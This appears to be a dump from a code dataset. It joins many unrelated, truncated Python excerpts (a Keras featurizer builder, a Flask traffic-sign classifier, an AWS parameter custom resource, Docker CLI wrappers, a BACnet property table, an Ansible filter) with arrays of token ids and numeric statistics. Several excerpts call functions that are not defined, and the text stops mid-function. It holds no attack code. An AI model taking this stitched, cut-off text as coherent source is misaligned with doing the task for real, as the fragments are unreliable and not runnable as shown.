' {}? Regardless, please choose an integer divisor.'
.format(num_features, num_pooled_features, recommended_downsample))
# -------------------------------------------------------- #
# Cast the pooling constant back to an int from a float if it passes the tests
return int(pooling_constant)
@t.guard(tensor=t.Any(), number_splices=t.Int(gte=1))
def _splice_layer(tensor, number_splices):
"""
Splice a layer into a number of even slices through skipping. This downsamples the layer,
and allows for operations to be performed over neighbors.
Parameters:
----------
layer: Tensor
the layer output being spliced
number_splices: int
the number of new layers the original layer is being spliced into.
NOTE: must be integer divisor of layer
Returns:
-------
list_of_spliced_layers : list of Tensor
a list of the spliced tensor sections of the original layer, with neighboring nodes
occupying the same indices across splices
"""
# -------------- #
# ERROR CHECKING #
# Need to check that the number of splices is an integer divisor of the feature
# size of the layer
num_features = tensor.shape[-1].__int__()
if num_features % number_splices:
raise ValueError('Number of splices needs to be an integer divisor of'
' the number of features. Tried to split {} features into'
' {} equal parts.'.format(num_features, number_splices))
# ------------------------------------------ #
# Split the tensor into equal parts by skipping nodes equal to the number
# of splices. This allows for merge operations over neighbor features
return [Lambda(lambda features: features[:, i::number_splices])(tensor) for i in
range(number_splices)]
@t.guard(features=t.Any(), num_pooled_features=t.Int(gte=1))
def _downsample_model_features(features, num_pooled_features):
"""
Take in a layer of a model, and downsample the layer to a specified size.
Parameters:
----------
features : Tensor
the final layer output being downsampled
num_pooled_features : int
the desired number of features to downsample to
Returns:
-------
downsampled_features : Tensor
a tensor containing the downsampled features with size = (?, num_pooled_features)
"""
# Find the pooling constant needed
pooling_constant = _find_pooling_constant(features, num_pooled_features)
# Splice the top layer into n layers, where n = pooling constant.
list_of_spliced_layers = _splice_layer(features, pooling_constant)
# Average the spliced layers to downsample
downsampled_features = average(list_of_spliced_layers)
return downsampled_features
def _check_downsampling_mismatch(downsample, num_pooled_features, output_layer_size):
"""
If downsample is flagged True, but no downsampling size is given, then automatically
downsample model. If downsample flagged false, but there is a size given, set downsample
to true.
Parameters:
----------
downsample : bool
Boolean flagging whether model is being downsampled
num_pooled_features : int
the desired number of features to downsample to
output_layer_size : int
number of nodes in the output layer being downsampled
Returns:
-------
downsample : boolean
Updated boolean flagging whether model is being downsampled
num_pooled_features : int
Updated number of features model output is being downsample to
"""
# If num_pooled_features left uninitialized, and they want to downsample,
# perform automatic downsampling
if num_pooled_features == 0 and downsample:
if output_layer_size % 2 == 0:
num_pooled_features = output_layer_size // 2
logging.warning('Automatic downsampling to {}. If you would like to set custom '
'downsampling, pass in an integer divisor of {} to '
'num_pooled_features.'.format(num_pooled_features, output_layer_size))
else:
raise ValueError('Sorry, no automatic downsampling available for this model.')
# If they have initialized num_pooled_features, but not turned on
# downsampling, downsample to what they entered
elif num_pooled_features != 0 and not downsample:
logging.info('Downsampling to {}.'.format(num_pooled_features))
downsample = True
return downsample, num_pooled_features
@t.guard(depth_of_featurizer=t.Int(gte=1, lte=4),
downsample=t.Bool,
num_pooled_features=t.Int(gte=0),
model_str=t.Enum(*supported_model_types.keys()),
loaded_model=t.Type(Model) | t.Null)
def build_featurizer(depth_of_featurizer, downsample, num_pooled_features=0,
model_str='squeezenet', loaded_model=None):
"""
Create the full featurizer.
Initialize the model, decapitate it to the appropriate depth, and check if downsampling
top-layer featurization. If so, downsample to the desired feature space
Parameters:
----------
depth_of_featurizer : int
How deep to cut the network. Can be 1, 2, 3, or 4.
downsample : bool
Boolean flagging whether to perform downsampling
num_pooled_features : int
If we downsample, integer determining how small to downsample.
NOTE: Must be integer divisor of original number of features
or 0 if we don't want to specify exact number
model_str : str
String deciding which model to use for the featurizer
loaded_model : keras.models.Model, optional
If specified - use the model for featurizing, istead of creating new one.
Returns:
-------
model: keras.models.Model
The decapitated, potentially downsampled, pre-trained image featurizer.
With no downsampling, the output features are equal to the top densely-
connected layer of the network, which depends on the depth of the model.
With downsampling, the output is equal to a downsampled average of
multiple splices of the last densely connected layer.
"""
# BUILDING INITIAL MODEL #
if loaded_model is not None:
model = loaded_model
else:
model = _initialize_model(model_str=model_str)
# DECAPITATING MODEL #
# Find the right depth from the dictionary and decapitate the model
model = _decapitate_model(model, supported_model_types[model_str]['depth'][depth_of_featurizer])
model_output = model.layers[-1].output
# Add pooling layer to the top of the now-decapitated model as the featurizer,
# if it needs to be downsampled
if len(model.layers[-1].output_shape) > 2:
model_output = GlobalAvgPool2D(name='featurizer')(model_output)
# Save the model output
num_output_features = model_output.shape[-1].__int__()
logging.info("Model decapitated.")
# DOWNSAMPLING FEATURES #
# Checking that the user's downsampling flag matches the initialization of the downsampling
(downsample, num_pooled_features) = _check_downsampling_mismatch(downsample,
num_pooled_features,
num_output_features)
# If we are downsampling the features, we add a pooling layer to the outputs
# to bring it to the correct size.
if downsample:
model_output = _downsample_model_features(model_output, num_pooled_features)
logging.info("Model downsampled.")
# Finally save the model
model = Model(inputs=model.input, outputs=model_output)
logging.info("Full featurizer is built.")
if downsample:
logging.info("Final layer feature space downsampled to {}".format(num_pooled_features))
else:
logging.info("No downsampling. Final layer feature space has size {}"
.format(num_output_features))
return model
| [
37811,
198,
1212,
2393,
7529,
351,
2615,
262,
4036,
2218,
333,
7509,
25,
198,
16,
13,
20768,
2890,
262,
554,
4516,
53,
18,
2746,
198,
17,
13,
4280,
499,
21712,
340,
284,
262,
5035,
6795,
198,
18,
13,
5588,
37687,
11347,
11,
611,
1... | 2.590885 | 5,683 |
#!/usr/bin/env python
__author__ = "Paul B. Manis"
__version__ = "0.4"
import pylibrary.plotting.plothelpers
import pylibrary.plotting.matplotlibexporter
import pylibrary.plotting.picker
import pylibrary.plotting.pyqtgraph_plothelpers
import pylibrary.plotting.styler
import pylibrary.plotting.talbotetalticks
import pylibrary.plotting.colormaps
| [
2,
48443,
14629,
14,
8800,
14,
24330,
21015,
198,
834,
9800,
834,
796,
366,
12041,
347,
13,
1869,
271,
1,
198,
834,
9641,
834,
796,
366,
15,
13,
19,
1,
198,
198,
11748,
279,
2645,
4115,
13,
29487,
889,
13,
29487,
16794,
364,
198,
... | 2.821138 | 123 |
import os
from os.path import dirname
from unittest import TestCase
from unittest.mock import patch
from traits.api import Callable
from traits.has_traits import provides, HasStrictTraits
from traits.testing.unittest_tools import UnittestTools
from pybleau.app.model.plot_template_manager import PlotTemplateManager
from pybleau.app.plotting.i_plot_template_interactor import \
IPlotTemplateInteractor
HERE = dirname(__file__)
@provides(IPlotTemplateInteractor)
| [
11748,
28686,
198,
6738,
28686,
13,
6978,
1330,
26672,
3672,
198,
6738,
555,
715,
395,
1330,
6208,
20448,
198,
6738,
555,
715,
395,
13,
76,
735,
1330,
8529,
198,
198,
6738,
12796,
13,
15042,
1330,
4889,
540,
198,
6738,
12796,
13,
1013... | 3.277778 | 144 |
from pymodm import MongoModel, fields
from rulesets.models.account import Account
import pdb
class Ruleset(MongoModel):
"""
A ruleset is a set of rules defining how to play an RPG.
.. todo:: Add the whole systme of entities to be able to populate the ruleset.
"""
title = fields.CharField(min_length=6)
description = fields.CharField()
created_at = fields.DateTimeField()
updated_at = fields.DateTimeField()
creator_id = fields.ObjectIdField() | [
6738,
12972,
4666,
76,
1330,
42591,
17633,
11,
7032,
198,
6738,
3173,
1039,
13,
27530,
13,
23317,
1330,
10781,
198,
11748,
279,
9945,
198,
198,
4871,
14252,
316,
7,
44,
25162,
17633,
2599,
198,
220,
37227,
198,
220,
220,
220,
317,
317... | 3.265734 | 143 |
import logging
from allocation.allocation_solver import AllocatedEvent
from applications.models import (
ApplicationEventSchedule,
ApplicationEventScheduleResult,
ApplicationEventStatus,
ApplicationRound,
)
from applications.utils.aggregate_data import (
ApplicationEventScheduleResultAggregateDataRunner,
)
logger = logging.getLogger(__name__)
| [
11748,
18931,
198,
198,
6738,
20157,
13,
439,
5040,
62,
82,
14375,
1330,
1439,
10533,
9237,
198,
6738,
5479,
13,
27530,
1330,
357,
198,
220,
220,
220,
15678,
9237,
27054,
5950,
11,
198,
220,
220,
220,
15678,
9237,
27054,
5950,
23004,
... | 3.572816 | 103 |
from __future__ import print_function
from rsc_webapp import app
import torch
import pandas as pd
import plotly.graph_objs as go
import numpy as np
import json
from torchvision import transforms
from torch.nn import functional as F
from PIL import Image
import time
import os
import random
import string
from classifier.model_1 import visualize_stn
import matplotlib.pyplot as plt
#import torch
#from torchvision import datasets, models, transforms
def generate_filename(size=10, chars=string.ascii_uppercase + string.digits, extension='png'):
"""Creates random filename
Args:
size: length of the filename part, without dot and extention
chars: character range to draw random characters from
extension: extension to be added to the returned filenam
Returns:
random filame with extension
"""
filename = ''.join(random.choice(chars) for _ in range(size))
return filename + '.' + extension
def ml_figures(input_filename):
"""
Performs inference on the input image and returns data
to be visualized by the web page
Args:
input_filename: full path to the input file
Returns:
figures: dict list containing plotly graph with probabilities for all classes
predicted_label: a string with predicted label name
iconpath: a path to predicted sign icon
maxConfidenceValue_str: confidence value for the top prediction
eval_time_str: time it took to load and evaluate the model
filename_stn_in: path to STN input file
filename_stn_out: path to STN output file
"""
model = app.config['MODEL']
transform_evaluate = app.config['TRANSFORM_EVALUATE']
img_paths = [input_filename]
img_list = [Image.open(img_path) for img_path in img_paths]
start_time = time.perf_counter()
input_batch = torch.stack([transform_evaluate(img).to('cpu') for img in img_list])
pred_tensor = model(input_batch)
pred_probs = F.softmax(pred_tensor, dim=1).cpu().data.numpy()
end_time = time.perf_counter()
eval_time_str = "{:.4f}".format(end_time - start_time)
# app.logger.info("evaluation time: {} seconds".format(eval_time_str))
maxConfidenceValue = np.amax(pred_probs[0,:])
maxConfidenceValue_str = "{:.4f}".format(maxConfidenceValue)
maxConfidenceClass = np.where(pred_probs[0,:] == maxConfidenceValue)[0][0]
# app.logger.info('maxConfidenceClass: {}'.format(maxConfidenceClass))
# app.logger.info('maxConfidenceValue: {}'.format(maxConfidenceValue_str))
# STN Visualizations
data = torch.stack([transform_evaluate(img).to('cpu') for img in img_list])
input_grid, transformed_grid = visualize_stn( model, data)
filename_stn_in = os.path.join(app.config['UPLOAD_FOLDER'], generate_filename(10))
filename_stn_out = os.path.join(app.config['UPLOAD_FOLDER'], generate_filename(10))
plt.imsave(filename_stn_in, input_grid, cmap='Greys')
plt.imsave(filename_stn_out, transformed_grid, cmap='Greys')
iconpath = app.config['ICONS_FOLDER'] + '/'+str(maxConfidenceClass)+".png"
idx_to_labels = app.config['IDX_TO_LABELS']
labels = app.config['LABELS']
predicted_label = idx_to_labels[str(maxConfidenceClass)][1]
graph_prob = []
graph_prob.append(
go.Bar(
x = pred_probs[0],
y = labels,
orientation='h',
showlegend=False,
textposition='outside',
marker=dict(
color='rgba(23, 162, 184, 0.6)', ##17a2b8
line=dict(
color='rgba(23, 162, 184, 1.0)',
width=1)
)
)
)
'''annotations = []
probs = np.round(df.probability.tolist(), decimals=4)
for yd, xd in zip(probs, df.class_id.tolist()):
# labeling bars
annotations.append(dict(xref='x1', yref='y1',
y=xd, x=yd + 3,
text=str(yd) + '%',
font=dict(family='Arial', size=12,
color='rgb(96, 50, 171)'),
showarrow=False))
'''
layout_prob = dict(xaxis = dict(
title = 'Probability',
zeroline=False,
showline=False,
showticklabels=True,
showgrid=True,
domain=[0, 1],
autorange=False,
range=[0, 1],
tick=0.1),
yaxis = dict(dtick=1),
height=900,
#annotations=annotations,
margin=dict(l=300, r=20, t=30, b=50),
paper_bgcolor='rgb(248, 249, 250)',
plot_bgcolor='rgb(248, 249, 250)',
uniformtext=dict(minsize=9, mode='hide')
)
# append all charts to the figures list
figures = []
figures.append(dict(data=graph_prob, layout=layout_prob))
return figures, predicted_label, iconpath, maxConfidenceValue_str, eval_time_str, filename_stn_in, filename_stn_out | [
6738,
11593,
37443,
834,
1330,
3601,
62,
8818,
198,
6738,
374,
1416,
62,
12384,
1324,
1330,
598,
198,
11748,
28034,
198,
11748,
19798,
292,
355,
279,
67,
198,
11748,
7110,
306,
13,
34960,
62,
672,
8457,
355,
467,
198,
11748,
299,
3215... | 2.250334 | 2,245 |
import datetime
import hashlib
import os
import random
import string
import typing
from distutils.util import strtobool
from cfn_custom_resource import CloudFormationCustomResource
try:
from _metadata import CUSTOM_RESOURCE_NAME
except ImportError:
CUSTOM_RESOURCE_NAME = 'dummy'
REGION = os.environ['AWS_REGION']
class Parameter(CloudFormationCustomResource):
"""
Properties:
Name: str: optional: Name of the Parameter (including namespace)
Description: str: optional:
Type: enum["String", "StringList", "SecureString"]: optional:
default "String"
KeyId: str: required if Type==SecureString
Value: str: required unless using RandomValue
RandomValue: dict: optional:
Set Value to a random string with these properties:
- length: int: default=22
- charset: string: default=ascii_lowercase + ascii_uppercase + digits
- anything-else: whatever: if it is changed, the value is regenerated
Tags: list of {'Key': k, 'Value': v}: optional:
ReturnValue: bool: optional: default False
Return the value as the 'Value' attribute.
Only useful if RandomValue is used to get the plaintext version
(e.g. when creating RDS'es)
Setting this option to TRUE adds additional Update restrictions:
Any change requires a password re-generation. The resource will fail
otherwise
ReturnValueHash: bool: optional: default False
Similar to ReturnValue, but returns a value that changes whenever the
value changes in the 'ValueHash' attribute (useful to import as dummy
environment variable to trigger a re-deploy).
Same Update restrictions apply.
"""
RESOURCE_TYPE_SPEC = CUSTOM_RESOURCE_NAME
DISABLE_PHYSICAL_RESOURCE_ID_GENERATION = True # Use Name instead
handler = Parameter.get_handler()
| [
11748,
4818,
8079,
198,
11748,
12234,
8019,
198,
11748,
28686,
198,
11748,
4738,
198,
11748,
4731,
198,
11748,
19720,
198,
6738,
1233,
26791,
13,
22602,
1330,
965,
83,
672,
970,
198,
198,
6738,
269,
22184,
62,
23144,
62,
31092,
1330,
10... | 2.754558 | 713 |
import logging
import flask
import dash_bootstrap_components as dbc
import dash_core_components as dcc
import dash_html_components as html
from dash.dependencies import Input, Output, State
from app import app
from db_users import create_new_user
from db_model import load_engine
FORMAT = "%(asctime)s - %(levelname)s - %(message)s"
logging.basicConfig(level=logging.DEBUG, format=FORMAT)
username_group = dbc.FormGroup(
[
dbc.Input(name="username", placeholder="Enter new username")
],
)
password_group = dbc.FormGroup(
[
dbc.Input(type="password", name="password", placeholder="Enter a unique password")
]
)
form = dbc.Col(
dbc.Card(
dbc.CardBody([
# for some reason, this does NOT work with dbc.Form
# will not hit the /submit route
html.H4("New Account"),
html.Br(),
html.Form(
[
username_group,
password_group,
dbc.Button("Submit", id="submit-button", block=True, color="primary")
],
id="uname-pw-submit",
action="/submit",
method="post"
)
])
),
md=4
)
layout = html.Div(
[
dbc.Row(dbc.Col(html.Br(), md=12)),
dbc.Row(
[
dbc.Col(md=4),
form,
dbc.Col(html.Div(id="submit-message"), md=4)
]
),
dbc.Row()
]
)
@app.server.route("/submit", methods=["POST"]) | [
11748,
18931,
198,
198,
11748,
42903,
198,
11748,
14470,
62,
18769,
26418,
62,
5589,
3906,
355,
288,
15630,
198,
11748,
14470,
62,
7295,
62,
5589,
3906,
355,
288,
535,
198,
11748,
14470,
62,
6494,
62,
5589,
3906,
355,
27711,
198,
6738,
... | 1.985915 | 781 |
import ast
import copy
#import numpy as np
import math
import logging
logger = logging.getLogger('CryptoArbitrageApp')
| [
11748,
6468,
198,
11748,
4866,
198,
2,
11748,
299,
32152,
355,
45941,
198,
11748,
10688,
198,
11748,
18931,
198,
198,
6404,
1362,
796,
18931,
13,
1136,
11187,
1362,
10786,
23919,
78,
3163,
2545,
8394,
4677,
11537,
628,
628,
628
] | 3.205128 | 39 |
import math
import csv
nCols = 20
# read the bin file and construct the matrix
# Thanks to Jimmy
# convert the cui to int
# Thanks to Jimmy
# a method to read the cui -> term csv file and construct a dict
| [
11748,
10688,
198,
11748,
269,
21370,
198,
198,
77,
5216,
82,
796,
1160,
628,
198,
2,
1100,
262,
9874,
2393,
290,
5678,
262,
17593,
198,
2,
6930,
284,
12963,
628,
198,
2,
10385,
262,
269,
9019,
284,
493,
198,
2,
6930,
284,
12963,
... | 3.365079 | 63 |
import os | [
11748,
28686
] | 4.5 | 2 |
#!/usr/bin/env python3
#
# Corey Goldberg, Dec 2012
#
import os
import sys
import xml.etree.ElementTree as ET
"""Merge multiple JUnit XML files into a single results file.
Output dumps to sdtdout.
example usage:
$ python merge_junit_results.py results1.xml results2.xml > results.xml
"""
if __name__ == '__main__':
main()
| [
2,
48443,
14629,
14,
8800,
14,
24330,
21015,
18,
198,
2,
198,
2,
220,
24154,
31225,
11,
4280,
2321,
198,
2,
198,
198,
11748,
28686,
198,
11748,
25064,
198,
11748,
35555,
13,
316,
631,
13,
20180,
27660,
355,
12152,
628,
198,
37811,
1... | 2.922414 | 116 |
# coding=utf-8
"""Author: Konrad Zemek
Copyright (C) 2015 ACK CYFRONET AGH
This software is released under the MIT license cited in 'LICENSE.txt'
Functions wrapping capabilities of docker binary.
"""
import json
import os
import subprocess
import sys
from six import string_types
# Adds a bind-mount consistency option depending on the container's access_level.
# This option applies to macOS only, otherwise is ignored by Docker. It relaxes
# the consistency guarantees between the host and container:
# * cached - the host is authoritative, writes on host may not be immediately
# visible on the container. Improves performance of read-heavy
# workloads.
# * delegated - the container is authoritative, writes on the container may
# not be immediately visible on the host, but they will be
# flushed before the container exit. Improves performance of
# write-heavy workloads.
# noinspection PyDefaultArgument
def cp(container, src_path, dest_path, to_container=False, docker_host=None):
"""Copying file between docker container and host
:param container: str, docker id or name
:param src_path: str
:param dest_path: str
:param to_container: bool, if True file will be copied from host to
container, otherwise from docker container to host
:param docker_host: dict
"""
cmd = ["docker", "cp"]
if to_container:
cmd.extend([src_path, "{0}:{1}".format(container, dest_path)])
else:
cmd.extend(["{0}:{1}".format(container, src_path), dest_path])
if docker_host:
cmd = wrap_in_ssh_call(cmd, docker_host)
subprocess.check_call(cmd)
def login(user, password, repository='hub.docker.com'):
"""Logs into docker repository."""
subprocess.check_call(['docker', 'login', '-u', user, '-p', password,
repository])
def build_image(image, build_args):
"""Builds and tags docker image."""
subprocess.check_call(['docker', 'build', '--no-cache', '--force-rm', '-t',
image] + build_args)
def tag_image(image, tag):
"""Tags docker image."""
subprocess.check_call(['docker', 'tag', image, tag])
def push_image(image):
"""Pushes docker image to the repository."""
subprocess.check_call(['docker', 'push', image])
def pull_image(image):
"""Pulls docker image from the repository."""
subprocess.check_call(['docker', 'pull', image])
def remove_image(image):
"""Removes docker image."""
subprocess.check_call(['docker', 'rmi', '-f', image])
def ps(all=False, quiet=False, filters=None):
"""
List containers
"""
cmd = ["docker", "ps"]
if all:
cmd.append("--all")
if quiet:
cmd.append("--quiet")
if filters:
for f in filters:
cmd.extend(['-f', '{}={}'.format(f[0], f[1])])
return subprocess.check_output(cmd, universal_newlines=True).split()
def list_volumes(quiet=True):
"""
List volumes
"""
cmd = ["docker", "volume", "ls"]
if quiet:
cmd.append("--quiet")
return subprocess.check_output(cmd, universal_newlines=True).split()
def remove_volumes(volumes, timeout=None, stderr=None):
"""
Remove volumes
"""
cmd = ["docker", "volume", "rm"]
if isinstance(volumes, str):
cmd.append(volumes)
else:
cmd.extend(volumes)
if timeout is not None:
cmd = add_timeout_cmd(cmd, timeout)
return subprocess.check_call(cmd, stderr=stderr)
def connect_docker_to_network(network, container):
"""
Connect docker to the network
Useful when dockers are in different subnetworks and they need to see each other using IP address
"""
subprocess.check_call(['docker', 'network', 'connect', network, container])
| [
2,
19617,
28,
40477,
12,
23,
198,
37811,
13838,
25,
17431,
6335,
1168,
368,
988,
198,
15269,
357,
34,
8,
1853,
7125,
42,
30440,
10913,
1340,
2767,
13077,
39,
198,
1212,
3788,
318,
2716,
739,
262,
17168,
5964,
9181,
287,
705,
43,
214... | 2.712571 | 1,416 |
import enum
bacnet_name_map = {
"acked-transitions": "0",
"ack-required": "1",
"action": "2",
"action-text": "3",
"active-text": "4",
"active-vt-sessions": "5",
"alarm-value": "6",
"alarm-values": "7",
"all": "8",
"all-writes-successful": "9",
"apdu-segment-timeout": "10",
"apdu-timeout": "11",
"application-software-version": "12",
"archive": "13",
"bias": "14",
"change-of-state-count": "15",
"change-of-state-time": "16",
"notification-class": "17",
"controlled-variable-reference": "19",
"controlled-variable-units": "20",
"controlled-variable-value": "21",
"cov-increment": "22",
"date-list": "23",
"daylight-savings-status": "24",
"deadband": "25",
"derivative-constant": "26",
"derivative-constant-units": "27",
"description": "28",
"description-of-halt": "29",
"device-address-binding": "30",
"device-type": "31",
"effective-period": "32",
"elapsed-active-time": "33",
"error-limit": "34",
"event-enable": "35",
"event-state": "36",
"event-type": "37",
"exception-schedule": "38",
"fault-values": "39",
"feedback-value": "40",
"file-access-method": "41",
"file-size": "42",
"file-type": "43",
"firmware-revision": "44",
"high-limit": "45",
"inactive-text": "46",
"in-process": "47",
"instance-of": "48",
"integral-constant": "49",
"integral-constant-units": "50",
"limit-enable": "52",
"list-of-group-members": "53",
"list-of-object-property-references": "54",
"local-date": "56",
"local-time": "57",
"location": "58",
"low-limit": "59",
"manipulated-variable-reference": "60",
"maximum-output": "61",
"max-apdu-length-accepted": "62",
"max-info-frames": "63",
"max-master": "64",
"max-pres-value": "65",
"minimum-off-time": "66",
"minimum-on-time": "67",
"minimum-output": "68",
"min-pres-value": "69",
"model-name": "70",
"modification-date": "71",
"notify-type": "72",
"number-of-apdu-retries": "73",
"number-of-states": "74",
"object identifier": "75",
"object-identifier": "75",
"object-list": "76",
"object-name": "77",
"object-property-reference": "77",
"object type": "79",
"object-type": "79",
"optional": "80",
"out-of-service": "81",
"output-units": "82",
"event-parameters": "83",
"polarity": "84",
"present value": "85",
"present-value": "85",
"priority": "86",
"priority-array": "87",
"priority-for-writing": "88",
"process-identifier": "89",
"program-change": "90",
"program-location": "91",
"program-state": "92",
"proportional-constant": "93",
"proportional-constant-units": "94",
"protocol-object-types-supported": "96",
"protocol-services-supported": "97",
"protocol-version": "98",
"read-only": "99",
"reason-for-halt": "100",
"recipient-list": "102",
"reliability": "103",
"relinquish-default": "104",
"required": "105",
"resolution": "106",
"segmentation-supported": "107",
"setpoint": "108",
"setpoint-reference": "109",
"state-text": "110",
"status-flags": "111",
"system-status": "112",
"time-delay": "113",
"time-of-active-time-reset": "114",
"time-of-state-count-reset": "115",
"time-synchronization-recipients": "116",
"units": "117",
"update-interval": "118",
"utc-offset": "119",
"vendor-identifier": "120",
"vendor-name": "121",
"vt-classes-supported": "122",
"weekly-schedule": "123",
"attempted-samples": "124",
"average-value": "125",
"buffer-size": "126",
"client-cov-increment": "127",
"cov-resubscription-interval": "128",
"event-time-stamps": "130",
"log-buffer": "131",
"log-device-object-property": "132",
"enable": "133",
"log-interval": "134",
"maximum-value": "135",
"minimum-value": "136",
"notification-threshold": "137",
"protocol-revision": "139",
"records-since-notification": "140",
"record-count": "141",
"start-time": "142",
"stop-time": "143",
"stop-when-full": "144",
"total-record-count": "145",
"valid-samples": "146",
"window-interval": "147",
"window-samples": "148",
"maximum-value-timestamp": "149",
"minimum-value-timestamp": "150",
"variance-value": "151",
"active-cov-subscriptions": "152",
"backup-failure-timeout": "153",
"configuration-files": "154",
"database-revision": "155",
"direct-reading": "156",
"last-restore-time": "157",
"maintenance-required": "158",
"member-of": "159",
"mode": "160",
"operation-expected": "161",
"setting": "162",
"silenced": "163",
"tracking-value": "164",
"zone-members": "165",
"life-safety-alarm-values": "166",
"max-segments-accepted": "167",
"profile-name": "168",
"auto-slave-discovery": "169",
"manual-slave-address-binding": "170",
"slave-address-binding": "171",
"slave-proxy-enable": "172",
"last-notify-record": "173",
"schedule-default": "174",
"accepted-modes": "175",
"adjust-value": "176",
"count": "177",
"count-before-change": "178",
"count-change-time": "179",
"cov-period": "180",
"input-reference": "181",
"limit-monitoring-interval": "182",
"logging-object": "183",
"logging-record": "184",
"prescale": "185",
"pulse-rate": "186",
"scale": "187",
"scale-factor": "188",
"update-time": "189",
"value-before-change": "190",
"value-set": "191",
"value-change-time": "192",
"align-intervals": "193",
"interval-offset": "195",
"last-restart-reason": "196",
"logging-type": "197",
"restart-notification-recipients": "202",
"time-of-device-restart": "203",
"time-synchronization-interval": "204",
"trigger": "205",
"utc-time-synchronization-recipients": "206",
"node-subtype": "207",
"node-type": "208",
"structured-object-list": "209",
"subordinate-annotations": "210",
"subordinate-list": "211",
"actual-shed-level": "212",
"duty-window": "213",
"expected-shed-level": "214",
"full-duty-baseline": "215",
"requested-shed-level": "218",
"shed-duration": "219",
"shed-level-descriptions": "220",
"shed-levels": "221",
"state-description": "222",
"door-alarm-state": "226",
"door-extended-pulse-time": "227",
"door-members": "228",
"door-open-too-long-time": "229",
"door-pulse-time": "230",
"door-status": "231",
"door-unlock-delay-time": "232",
"lock-status": "233",
"masked-alarm-values": "234",
"secured-status": "235",
"absentee-limit": "244",
"access-alarm-events": "245",
"access-doors": "246",
"access-event": "247",
"access-event-authentication-factor": "248",
"access-event-credential": "249",
"access-event-time": "250",
"access-transaction-events": "251",
"accompaniment": "252",
"accompaniment-time": "253",
"activation-time": "254",
"active-authentication-policy": "255",
"assigned-access-rights": "256",
"authentication-factors": "257",
"authentication-policy-list": "258",
"authentication-policy-names": "259",
"authentication-status": "260",
"authorization-mode": "261",
"belongs-to": "262",
"credential-disable": "263",
"credential-status": "264",
"credentials": "265",
"credentials-in-zone": "266",
"days-remaining": "267",
"entry-points": "268",
"exit-points": "269",
"expiry-time": "270",
"extended-time-enable": "271",
"failed-attempt-events": "272",
"failed-attempts": "273",
"failed-attempts-time": "274",
"last-access-event": "275",
"last-access-point": "276",
"last-credential-added": "277",
"last-credential-added-time": "278",
"last-credential-removed": "279",
"last-credential-removed-time": "280",
"last-use-time": "281",
"lockout": "282",
"lockout-relinquish-time": "283",
"max-failed-attempts": "285",
"members": "286",
"muster-point": "287",
"negative-access-rules": "288",
"number-of-authentication-policies": "289",
"occupancy-count": "290",
"occupancy-count-adjust": "291",
"occupancy-count-enable": "292",
"occupancy-lower-limit": "294",
"occupancy-lower-limit-enforced": "295",
"occupancy-state": "296",
"occupancy-upper-limit": "297",
"occupancy-upper-limit-enforced": "298",
"passback-mode": "300",
"passback-timeout": "301",
"positive-access-rules": "302",
"reason-for-disable": "303",
"supported-formats": "304",
"supported-format-classes": "305",
"threat-authority": "306",
"threat-level": "307",
"trace-flag": "308",
"transaction-notification-class": "309",
"user-external-identifier": "310",
"user-information-reference": "311",
"user-name": "317",
"user-type": "318",
"uses-remaining": "319",
"zone-from": "320",
"zone-to": "321",
"access-event-tag": "322",
"global-identifier": "323",
"verification-time": "326",
"base-device-security-policy": "327",
"distribution-key-revision": "328",
"do-not-hide": "329",
"key-sets": "330",
"last-key-server": "331",
"network-access-security-policies": "332",
"packet-reorder-time": "333",
"security-pdu-timeout": "334",
"security-time-window": "335",
"supported-security-algorithms": "336",
"update-key-set-timeout": "337",
"backup-and-restore-state": "338",
"backup-preparation-time": "339",
"restore-completion-time": "340",
"restore-preparation-time": "341",
"bit-mask": "342",
"bit-text": "343",
"is-utc": "344",
"group-members": "345",
"group-member-names": "346",
"member-status-flags": "347",
"requested-update-interval": "348",
"covu-period": "349",
"covu-recipients": "350",
"event-message-texts": "351",
"event-message-texts-config": "352",
"event-detection-enable": "353",
"event-algorithm-inhibit": "354",
"event-algorithm-inhibit-ref": "355",
"time-delay-normal": "356",
"reliability-evaluation-inhibit": "357",
"fault-parameters": "358",
"fault-type": "359",
"local-forwarding-only": "360",
"process-identifier-filter": "361",
"subscribed-recipients": "362",
"port-filter": "363",
"authorization-exemptions": "364",
"allow-group-delay-inhibit": "365",
"channel-number": "366",
"control-groups": "367",
"execution-delay": "368",
"last-priority": "369",
"write-status": "370",
"property-list": "371",
"serial-number": "372",
"blink-warn-enable": "373",
"default-fade-time": "374",
"default-ramp-rate": "375",
"default-step-increment": "376",
"egress-time": "377",
"in-progress": "378",
"instantaneous-power": "379",
"lighting-command": "380",
"lighting-command-default-priority": "381",
"max-actual-value": "382",
"min-actual-value": "383",
"power": "384",
"transition": "385",
"egress-active": "386"
}
| [
11748,
33829,
628,
198,
198,
65,
330,
3262,
62,
3672,
62,
8899,
796,
1391,
198,
220,
220,
220,
366,
6021,
12,
7645,
1756,
1298,
366,
15,
1600,
198,
220,
220,
220,
366,
441,
12,
35827,
1298,
366,
16,
1600,
198,
220,
220,
220,
366,
... | 2.283344 | 4,881 |
#!/usr/bin/env python
'''
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
import AmbariConfig
import threading
import os
import time
import re
import logging
# Module-level logger, named after this module.
logger = logging.getLogger(__name__)

# NOTE(review): main() is not defined in this excerpt; it is presumably
# defined elsewhere in the full module -- confirm before running standalone.
if __name__ == "__main__":
  main()
| [
2,
48443,
14629,
14,
8800,
14,
24330,
21015,
198,
198,
7061,
6,
198,
26656,
15385,
284,
262,
24843,
10442,
5693,
357,
1921,
37,
8,
739,
530,
198,
273,
517,
18920,
5964,
11704,
13,
220,
4091,
262,
28536,
2393,
198,
17080,
6169,
351,
... | 3.780876 | 251 |
import re
from ansible import errors
class FilterModule:
    """Ansible filter plugin exposing the 'expand_range' filter."""

    @staticmethod
    def filters():
        """Map filter names to their implementations for Ansible."""
        return {"expand_range": FilterModule.expand_range}

    @staticmethod
    def expand_range(text):
        """Expand an interface range spec such as 'Eth[1:3]' into a list.

        The input must be a non-whitespace base name immediately followed
        by a '[start:stop]' suffix with integer bounds; the result is the
        base with each number in the inclusive range appended.
        """
        # One match means: ('<base>', '[x:y]'); no match means bad input.
        match = re.findall(r"^(\S+)(\[\d+:\d+\])$", text)
        if not match:
